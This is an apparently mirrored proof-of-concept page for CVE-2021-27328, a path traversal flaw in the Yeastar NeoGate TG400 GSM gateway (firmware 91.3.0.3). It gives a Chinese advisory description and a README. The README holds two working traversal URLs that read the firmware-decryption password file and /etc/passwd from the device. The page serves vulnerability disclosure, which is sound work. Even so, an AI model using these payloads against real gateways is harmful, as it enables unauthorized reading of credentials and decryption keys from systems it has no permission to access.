CVE-2021-27328 PoC — Yeastar NeoGate TG400 路径遍历漏洞

Source

https://github.com/SQSamir/CVE-2021-27328

Associated Vulnerability

Title:Yeastar NeoGate TG400 路径遍历漏洞 (CVE-2021-27328)
Description:Yeastar Yeastar NeoGate TG400是西班牙Yeastar公司的一个应用软件。提供为电信经销商提供了一个平台，可通过其全方位的功能，可伸缩性和UC功能轻松启动托管的PBX业务。 Yeastar NeoGate TG400 中存在路径遍历漏洞。该漏洞源于产品未能正确地过滤资源或文件路径中的特殊元素，经过身份验证的用户可以解密固件，并可以读取敏感信息，如密码或解密密钥。以下产品及版本受到影响：Yeastar NeoGate TG400 91.3.0.3。

Readme

# Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3




This is a Proof of Concept for CVE-2021-27328

## Example
* to get  firmware decrypting password

```
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
```
* to get /etc/paswd

```
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
```

File Snapshot


 [4.0K]  /data/pocs/f4c8dd17939b6fd0db984b8e29b32440804e36d7
├── [ 364]  README.md
├── [147K]  ys_passwd.png
└── [215K]  ys_zippass.png

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!